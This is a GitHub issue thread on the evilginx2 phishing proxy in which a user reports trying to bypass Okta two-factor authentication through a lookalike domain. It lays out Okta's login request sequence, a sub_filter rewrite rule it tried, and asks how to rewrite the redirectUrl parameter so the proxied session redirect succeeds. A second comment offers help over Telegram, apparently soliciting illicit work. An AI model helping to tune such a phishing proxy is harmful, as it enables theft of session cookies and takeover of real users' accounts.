### ISSUE TITLE
Evilginx 2.3.0 Okta issue 

### ISSUE THREAD

**Issue by dosomemagic** [kgretzky/evilginx2#420]
Hi, 
I'm trying to bypass Okta 2-factor authentication. 

Following requests are required to login to Okta service: 

Login request:  
> POST https://real.okta.com/api/v1/authn 

The next request after the successful login is: 
> GET /login/sessionCookieRedirect?checkAccountSetupComplete=true&token=XXXXX&redirectUrl=https%3A%2F%2Freal.okta.com%2Fuser%2Fnotifications

The next request:
> https://real.okta.com/user/notifications

Using Evilginx: 
Login request:  
> POST https://subdomain.fakedomain.com/api/v1/authn 

The next request after the successful login is: 
> GET /login/sessionCookieRedirect?checkAccountSetupComplete=true&token=XXXXX&redirectUrl=https%3A%2F%2Fsubdomain.fakedomain.com%2Fuser%2Fnotifications
**Response: 403 Forbidden**

If there is no `sub_filter` rule, the value of the `redirectUrl` parameter is replaced to `"https%3A%2F%2Fsubdomain.fakedomain.com%2Fuser%2Fnotifications"`
and as a result, I receive response 403 Forbidden and link to the home directory. 
After pressing the `home directory` button, I forwarded to:
> https://subdomain.fakedomain.com/user/notifications 
and everything works fine. 

I have tried to use following `sub_filter` rule:
`triggers_on: 'real.okta.com', orig_sub: 'real', domain: 'okta.com', search: '\\x2Fuser\\x2Fnotifications', replace: 'https\x3A\x2F\x2Fsubdomain.fakedomain.com\x2Fuser\x2Fnotifications', mimes: ['text/html', 'application/json', 'application/x-javascript', 'text/javascript']}`
but with now luck.  (real.okta.com domain is replaced to subdomain.fakedomain.com) 

In additional, i have tried to configure lures `redirect_url`, but these rule working after `/login/sessionCookieRedirect` request. 

Is it possible to drop this request or to create the rule to replace the value of the `redirectUrl ` parameter to `subdomain.fakedomain.com`?

> GET /login/sessionCookieRedirect?checkAccountSetupComplete=true&token=XXXXX&redirectUrl=https%3A%2F%2Fsubdomain.fakedomain.com%2Fuser%2Fnotifications

Thanks

**Comment by spam441** [comment]
contact me on telegram if u guys need any help @iambecomedeath
